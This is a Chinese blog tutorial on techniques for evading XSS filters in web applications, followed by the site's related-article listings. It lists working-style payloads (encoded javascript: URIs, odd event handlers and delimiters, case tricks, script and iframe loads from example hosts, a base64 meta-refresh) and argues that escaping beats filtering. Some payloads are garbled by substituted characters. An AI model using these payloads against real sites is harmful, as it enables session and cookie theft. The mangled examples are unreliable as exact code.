绕过 Web 应用程序中的 XSS 过滤器

最新推荐文章于 2023-08-27 14:47:39 发布
最新推荐文章于 2023-08-27 14:47:39 发布
阅读量496 收藏
点赞数
文章标签: javascript 开发语言 ecmascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/allway2/article/details/125961309
版权

规避跨站脚本 (XSS) 漏洞的两种主要技术是 XSS 过滤和 XSS 转义。然而,XSS 过滤是不可取的,因为它通常可以利用巧妙的策略来规避。

在本教程中,我们将说明黑客可能在其恶意代码中利用的一些技术,以轻松绕过 Web 应用程序中的 XSS 过滤器。

XSS 过滤的工作原理

XSS 过滤器通过定位可部署为跨站点脚本攻击向量的普通模式并从用户输入数据中删除此类代码片段来运行。

最常使用正则表达式发现模式。这是非常困难的,因为可以表示跨站点脚本有效负载的模式也可以作为网页内容合法部署。因此,过滤器应该能够避免误报。

此外,Firefox、Google Chrome 和 Internet Explorer 等当代 Web 浏览器在格式错误的 HTML 代码方面具有极强的容错能力。

此外,JavaScript 非常灵活,并且经常可以通过各种方式表达相同的实用性。黑客可以通过故意构建避开常见 XSS 搜索模式的代码来利用这些情况。

从理论上讲,构建一个实际可靠的 XSS 过滤器是可行的。尽管如此,过滤器的复杂性可能是巨大的,并且存在黑客发明一种新的绕过方法的可能性。因此,转义被认为是防止跨站点脚本攻击的更直接的提倡技术。

XSS 过滤器绕过技术

部署字符编码

为克服过滤器而部署的后续跨站点脚本向量基于可以启动过滤器的编码字符。

黑客使用多种编码方法,例如 HTML 实体和 Base64。编码取决于精确需要编码的内容。例如,href标签 URL 支持 URL 编码,但标签名称不支持。

例如,为了欺骗搜索常见 ASCII 模式的过滤器,黑客可以替换

javascript:alert(document.cookie)

jav
script&#x3aalert(document&#x2Ecookie)

请记住,演员可以跳过任何或所有分号。

如果过滤器了解如何确认编码尝试,则参与者可以尝试通过部署带有填充的十进制编码和跳过分号来欺骗它。

例如,以下等效于alert

&#0000097&#0000108&#0000101&#0000114&#0000116

欺骗正则表达式

有时,绕过过滤器只需要发现一种欺骗正则表达式的技术。

例如,攻击者可以使用带括号的虚假标签,例如:

<script a=">" src="http://example.com/xss.jpg"></script>

如果正则表达式没有正确编写,它将假定脚本标记以初始右括号结尾。

此外,请注意如何调用该文件以模仿 JPG 图像和搜索特定文件扩展名的技巧过滤器。

使用非典型事件处理程序

尽管许多 XSS 过滤器在普通事件处理程序(如onerroronfocusonclickonmouseover或)中测试可能的 JavaScript onclick,但参与者可以尝试使用各种其他事件处理程序。例如,与选框相关的事件处理程序,如onfinishonstart

可以在网上找到最广泛的处理程序列表。

使用非典型分隔符

有多种字符可以部署为分隔符来代替空格。现代网络浏览器仍将正确执行代码。

例如,攻击者可以部署单引号、双引号和反引号(仅适用于许多 Web 浏览器)。

一个例子是:

<script src=test`οnlοad=`alert(document.cookie)>

此外,黑客可能会尝试使用额外的尖括号和斜线(评论)来欺骗过滤器。

例如:

<<script>alert(document.cookie)//<</script>

现代网络浏览器通常非常宽容,甚至可以正确执行后续代码:

<iframe src=http://xss.example.com/xss.html <

此外,请记住,标签名称后的初始空格可以用更多的分隔符替换。例如,演员可以用一个斜杠替换它:

<img/οnlοad=alert(document.cookie)>

案例处理和字符插入

在过滤器区分大小写的情况下,如果对手部署了与预期不同的案例,则可能会被欺骗。

例如,黑客可以部署<sCrIpT><SCRIPT><Script>.

此外,现代 Web 浏览器通常会忽略参与者在 HTML 标记中插入的换行符、额外空格、制表符和回车符。

例如,黑客可以使用<script[\x09]><script[\x10]><script[\x13]><script   >.

此外,黑客可以尝试在任何地方插入空字节。例如:<[\x00]script>

标签和属性

许多过滤器只关注公共标签。因此,攻击者可能会部署不常见的标签来绕过它们,例如<svg>.

然而,过滤器经常忘记包含明显的标签,如<body onload=alert(document.cookie)>.

故意失误

尽管故意的失误可能会帮助黑客绕过许多过滤器,但网络浏览器仍然会理解上下文。

当黑客在错误的位置、不按顺序使用引号或只是忘记包含相关引号时,情况尤其如此。

因此,一个例子是:

<input type="text" name="test" value="><script>alert("xss")</script>

因此,尽管代码仍会执行,但未关闭的引号后面的值可能会欺骗过滤器,因为大多数 Web 浏览器会将引号视为已关闭并在内部修复代码。

用于欺骗过滤器的其他故意错误可能涉及在标签名称后面包含垃圾内容。

一些当代的网络浏览器将完全无视包含的内容。因此,对手可以<script/anything>利用<script>.

结论

正如我们所见,黑客可以轻松绕过 Web 应用程序中的跨站点脚本过滤器。过滤器规避继续发展,当新技术被发现时,未来会出现新技术也就不足为奇了。

可以同时部署多种技术以提高规避效率。例如,演员可以使用类似Base64 编码的meta标签:refresh

<meta http-equiv="refresh" content="0;url=data:text/html base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ">
allway2
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
过滤器防止xss攻击
yizhousai0662的博客
09-01 1201
将参数有关xss攻击的非法字符全部处理掉。
Springboot配置XSS过滤器XssFilter
热门推荐
涛哥是个大帅比
12-08 1万+
简单介绍: XSS : 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 sql注入:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用
网络安全之基于过滤器防御xss脚本攻击
zyxpython的博客
05-07 706
过滤器和拦截器
XSS过滤器
spum_的博客
08-27 250
【代码】XSS过滤器
第十二节 XSS 过滤器绕过-01
09-15
XSS 过滤器绕过技术详解 ...XSS 过滤器绕过技术需要攻击者具备深入的知识和经验,包括 Web 应用程序安全、XSS 攻击技术、自动化工具使用等。Web 开发者需要了解这些技术,来防止 XSS 攻击和保护用户信息。
自动绕过 XSS过滤器_Java_代码_相关文件_下载
07-12
绕过 XSS 过滤器 概述 snuck 是一个自动工具,其目标是通过基于反射上下文的专门注入来显着测试给定的 XSS 过滤器。这种方法采用 Selenium 来驱动 Web 浏览器来重现攻击者和受害者的行为。 更多详情、使用方法,...
XSSBypass:XSS绕过技术
05-17
2. **XSS过滤器绕过** - Web应用程序通常会使用过滤器来防止XSS攻击,但这些过滤器可能有漏洞或不够完善。攻击者可以通过编码、字符集转换、使用特殊字符、或者利用过滤器的逻辑漏洞来绕过防御。 - 例如,使用...
第十三节 利用CSS特性绕过XSS过滤-01
最新发布
09-15
但是,攻击者可以利用CSS特性来绕过XSS过滤机制,在今天的课程,我们将为大家介绍如何利用CSS特性绕过XSS过滤。 XSS漏洞发现 在寻找XSS漏洞时,攻击者需要构造特殊的无害字符串,然后在响应寻找该字符串。这样...
第十节 绕过过滤domain为空的XSS-01
09-15
绕过XSS过滤机制需要深入理解过滤规则以及JavaScript语言的特性和编码方式。通过双写和编码绕过,攻击者可以在看似安全的环境注入恶意脚本,实现XSS攻击。因此,对于开发者来说,了解这些攻击手段并实施严格的...
保姆级教学 XSS攻击的过滤器
m0_59206144的博客
06-07 1723
过滤策略:把特殊字符转为HTML实体编码, 这样存在数据库里较安全 返回给前端时会被js解析为正常字符,不影响查看
Web安全测试之XSS
weixin_34234829的博客
03-21 358
XSS 全称(Cross Site Scripting) 跨站脚本***, 是Web程序最常见的漏洞。指***者在网页嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到***者的目的. 比如获取用户的Cookie,导航到恶意网站,携带***等。 作为测试人员,需要了解XSS原理,***场景,如何修复。 才能有效...
【RuoYi-Vue-Plus】学习笔记 44 - XSS 过滤器以及 @Xss 注解简单分析
MichelleChung的星球
11-25 3344
简单分析 XSS 过滤器以及 @Xss 注解。
XSS过滤器的实现
weixin_33834679的博客
03-18 972
一、XSS是什么   全称跨站脚本(cross site script)XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面去。使别的用户访问都会执行相应的嵌入代码。 比如在input框填写了可以执行的javascript脚本,而后台并没有做过滤与校验。 二、过滤器是什么   过滤器,顾名思义过滤某种物质的设备,在Java用...
XSS过滤器的配置解析
m0_37027631的博客
12-13 4220
XSS过滤器的配置解析 http://pan.baidu.com/s/1eSgIwMI(百度云代码下载链接) 知识点拓展:在myeclipse或者eclipsesrc或者WebRoot(myeclipse)/WebContent(eclipse的文件的路径是项目的根路径 1、src下(或者任意路径下)创建XSSFilter文件夹,里面创建五个类(详细代码去上边百度云链接地址下载)
使用HTML Purifier解决XSS问题
追逐
08-22 1153
在php里解决XSS最简单的方法是使用htmlspecialchars转义xml实体,但对于需要使用xml的时候就搏手无策了。之前一直使用一个叫RemoveXSS的函数,该函数过滤得比较严格,很多html特性都过滤了,而且有bug,不修改代码使用起来很不友好,修改了却无法应对灵活的XSS攻击。  HTML Purifier是基于php 5所编写的HTML过滤器,支持自定义过滤规则,还可以
Web安全之XSS攻击
m0_74131821的博客
04-05 403
XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序最常见的漏洞
XSS攻击过滤器实现
EvanDeveloper的专栏
07-12 1678
一、XSS简介 百度百科的解释: XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 它与SQL注入攻击类似,SQL注入攻击以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击,通过插入恶意脚本,实现对用户游览器的控制,获取用户的一些信息。 二、XSS分类 xss攻击可以分成两种类型: 非持久型攻击 持久型攻
java防止xss攻击(过滤器
meat_eating的博客
11-08 2993
java防止xss攻击
Web应用安全测试:XSS过滤器逃逸和WAF绕过技术
在学习 XSS 测试之前,需要了解一些基本概念,例如 Web 应用程序过滤器、黑名单、白名单、sanitize 等。黑名单是一种常见的 XSS 防御机制,通过阻止恶意脚本的执行来防止 XSS 攻击。然而,黑名单并不是 foolproof ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值